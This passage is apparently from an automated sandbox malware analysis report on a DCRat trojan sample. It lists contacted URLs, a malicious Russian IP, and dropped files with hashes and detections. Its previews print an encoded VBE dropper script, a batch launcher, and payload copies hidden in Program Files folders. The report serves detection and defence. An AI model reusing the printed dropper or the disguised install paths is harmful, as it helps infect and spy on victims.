                                                                                                                                        http://www.fontbureau.com/designers8ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.2023418258.000001FDA8A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://support.mozilla.orgUJ59LdJnt9.24.drfalse
                                                                                                                                              		high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013044000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FFE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A64000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AAA000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131A2000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001315C000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139D8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000014689000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FB8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AF0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131E8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001308A000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013116000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A1E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013312000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013358000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drfalse
                                                                                                                                                		high
                                                                                                                                                http://86.110.Hx;ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://crl.microspowershell.exe, 00000007.00000002.2748232345.000001FDC0C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high

                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public IPs

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    86.110.194.28
                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                    		208861RACKTECHRUtrue

                                                                                                                                                    Private

                                                                                                                                                    IP
                                                                                                                                                    127.0.0.1

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1583613
                                                                                                                                                    Start date and time:2025-01-03 07:56:09 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 10m 15s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:28
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:updIMdPUj8.exe
                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                    Original Sample Name:bc1fb66921db74a0051917b26a4bd316.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@35/375@0/2
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 37.5%
                                                                                                                                                    HCA Information:Failed
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                    Warnings

                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.164, 52.149.20.212, 13.107.246.45
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7804 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7812 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7828 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7852 because it is empty
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    01:57:27API Interceptor150x Sleep call for process: powershell.exe modified
                                                                                                                                                    01:57:40API Interceptor211103x Sleep call for process: ZWgKQlTqcrSB.exe modified
                                                                                                                                                    01:57:43API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASNs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    RACKTECHRUjew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 91.223.144.119
                                                                                                                                                    la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 193.38.236.134
                                                                                                                                                    oyCvLcfl3R.exeGet hashmaliciousXenoRATBrowse
                                                                                                                                                    • 194.113.106.81
                                                                                                                                                    qsKo.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                    • 194.113.106.180
                                                                                                                                                    GsrDwm0DJG.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                    • 194.113.106.180
                                                                                                                                                    HeggBkMoYE.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                    • 194.113.106.180
                                                                                                                                                    b2J6hgvd51.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 45.128.232.191
                                                                                                                                                    TbFoReHi2v.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 45.128.232.235
                                                                                                                                                    gmA11dfzc2.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 45.128.232.235
                                                                                                                                                    naoen3DFXE.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 45.128.232.235

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\user\Desktop\AQlYVRJc.logf3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                      r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                        Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                            vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                              6G8OR42xrB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                  9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    150bIjWiGH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):109
                                                                                                                                                                        Entropy (8bit):5.292863224313856
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:wsWrGN9TUagBTErQKaNcqKxAmy1L4c9n2w3i:txUjvLNcq1qgnX3i
                                                                                                                                                                        MD5:D668E447B3CFC8C4398EC091A033710B
                                                                                                                                                                        SHA1:D8691101D9A35C3D993B8CF40134A8D2AA009114
                                                                                                                                                                        SHA-256:2F2F1026E1514FCC6ACE594FABAD973B43C83C709493CEA8F0E19F829E31AC00
                                                                                                                                                                        SHA-512:C9F3AB19E056902835C06B3D0B2187CEC0203D76DE888B010B10A8F53949B2250E2522CAC878946191268212BECE715C39D9E74AA62F8C93881F0E772BA0A014
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:%HHfloO%%SskCHhHcUut%..%MBjOGfVEwqUJzS%"C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"%XOaqabWIcSURX%

                                                                                                                                                                        C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.....\;(...@...................................'.K.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H........... ,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):228
                                                                                                                                                                        Entropy (8bit):5.871879918776451
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:GJ2wqK+NkLzWbHBUrFnBaORbM5nCkh4KH+3rj2ttL9:GZMCzWL+hBaORbQCc4nHY7
                                                                                                                                                                        MD5:874EF46FE42F511DE26FE5EC8980F5FE
                                                                                                                                                                        SHA1:65237AA9425BFACD4E1846FE0BE657F0EFD4F13C
                                                                                                                                                                        SHA-256:E216400C98C15EE36C181C89021F37738309EF34D06352B638535C7A08F66F95
                                                                                                                                                                        SHA-512:AC2C80406C6376014AB1237D3F0996B166535136D082A8CA27B529BE8C5177BC6F9AB86CB3B866728076269383534B7475D508373AF67ED2856D408AB8950979
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Preview:#@~^ywAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vF.!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z$Mk9o+Ul7n/tWUkDW.&Jnkxf,:H&tAJCjbw%\q"qd*(|A{S5mAfc4lOEBPT~,WmVd.YD8AAA==^#~@.

                                                                                                                                                                        C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.....\;(...@...................................'.K.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H........... ,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Program Files (x86)\Windows NT\Accessories\b2c372d662fd88

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (984), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):984
                                                                                                                                                                        Entropy (8bit):5.897375865340708
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:9NGCwQQ9eGNDzTXwREaRuodW4WAC8IF3vtV/Se+rAUfVNP4Vq426olG6AAyy8Ml4:mQw7DzTARDAAO+EvHSepUfVOQnO3MQ5
                                                                                                                                                                        MD5:35D4587B22AC2E4AC8A2B691EB260AF6
                                                                                                                                                                        SHA1:E1C66E4C02DA7A3D489FAA47B49B50693295C324
                                                                                                                                                                        SHA-256:14A01220F3A0E2E598910BFA079EC76957DA5F3F9E2A3DF9F8FA1C91223DB27C
                                                                                                                                                                        SHA-512:0BB1453F325EB1619212A8DE90D833C040CF646DC6CCB8569D260EB67F9425682E1A4BD43D79D1FAA96B71E78BF076337367209747CE1C43468174E0A7A67D02
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:dsUeMRW9mDdFtry0tEWGpDqEAWGXx2o0gsL1cPetkjPcWEiqUemScYTZCPd0K8MuYmjAf6XekmfFxOr6xZDSPVYHZvyMvnilXfDuehLXGIsz2NmyigCv53eCObluILs6E3sSK7cPOqMGniPLJAoPlxqdABfC6aP4avv8eTnkDwgPrXYqMZkIgcVQNPRJcaTxbRq2wQrzWDLyQbwmmyzgzGX8afuPBeIncsyZrg45svwdRg9wdohnkx8U4scRfcx15hWinX5F43xEU4q3f8wW7fDoude9EmaP74itKbJFtbsq9399Biwhqa4ZeryJ26BSdiGaW7tDyqnfwWp0ef7g02jhAIPdnANxaaNbxinEzssAxYmIB7oX8fbl8jaOrQayd0FWJND623qHKjulfGbpV0y58ldNIYWjR3g6TQ8y4sfFyUaZzztlyvdnBKYhuzydgH0QCxSPImvnVtGoLEYSpvuga34I1bDE4BiqdKWBhdcMAzRSDuWqafxvXU0I2JXqjqtTKaKArWvLShgklmFGFXoZOxSJUNJXGwnTG8InkV8DtldzyPgQDRlLBUEXHBqdNXFg4MendcgtYkpmUcVFr2UzLbSw3ufjpf0Vf64lv3wlu1wbocDoplwUDQUd4rts67E3uUGXitUxGtETo0Ibr03DsfRPmbrDJDoww3qTVqG6R8OULAyDjSBFEBKOC1uGCQoCERhvJyFBu7wuR7Dlmne1CisvscRe593AULP3dD3uMAVGOa6ExJeYww9gjvDrhlFuDvZFsKHjutpCNlgRgMrvffNhMtUsAMNk4kDcB0WnC4oDH7S7OvLU4TOih138zZjhfEHmiDQpzDtl1KaOaXdOB3qkWf5J6YxnVGhD0qZKffe0knqXbphc5UfmXgQCIGsbPFPunWYu7SsfY0AsyirR0VsAk4pTaWBYxCkfX6uERxeml9OhghOkYal4XPJsrEUkRUsVPfV2ynAD1FYlqIx2

                                                                                                                                                                        C:\Program Files\Adobe\ZWgKQlTqcrSB.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.....\;(...@...................................'.K.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H........... ,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Program Files\Adobe\b2c372d662fd88

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73
                                                                                                                                                                        Entropy (8bit):5.446473017695219
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Ij8NGp8RfDisnRIX+SyDy8:Ij8NNirX+SyDy8
                                                                                                                                                                        MD5:061E8FC04C6EE74A77E72F9FE04633D1
                                                                                                                                                                        SHA1:07075DFA7DE903C3830FA88EB06A3C9E1326424E
                                                                                                                                                                        SHA-256:74B58DF3C842233597F81301E2475B3BE92629A8A884A984AF0C02D462952CF2
                                                                                                                                                                        SHA-512:89A1D465ADB2494C73E8C9CC5FEC5483918CECF1BFB0BC9352281AB1270BCE27DDCC908AFF65CFE9874827E616A52EFA9914B262961086885956F0B86D391D87
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:M0i5DeCYhx0qtl9Qrug6zJLiOY4Pp0w3G1GIGaVXmdvWDP5L5KnfgHOCpArojwtqA7j2f0KRY

                                                                                                                                                                        C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.....\;(...@...................................'.K.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H........... ,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Program Files\Windows Multimedia Platform\b2c372d662fd88

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (324), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                        Entropy (8bit):5.83733551215271
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:RTZksO/qSRJGwIahYdBnNSpK2orZPl37PGP9yP+Fh3NfXn:hZkbCicwIaaDnX9P8h3JXn
                                                                                                                                                                        MD5:AF39D87C3C2E16FEFC1E4048000D658B
                                                                                                                                                                        SHA1:4BBC1BE9423FAF6D6B2F2524E8CCE1B8A74EE120
                                                                                                                                                                        SHA-256:7687372E048942EE0BCF1D2CFA76945EFC692D8063A6E963B40B9F37851921C2
                                                                                                                                                                        SHA-512:FA53EBA070D9007053916667E4325C6149ECA9D6B8082D2B7E8F35CDFE39B729808F1FEA58D323549F0988EA3F8DE3685A14E607CCF6EFCE63448E9228842B60
                                                                                                                                                                        Malicious:false
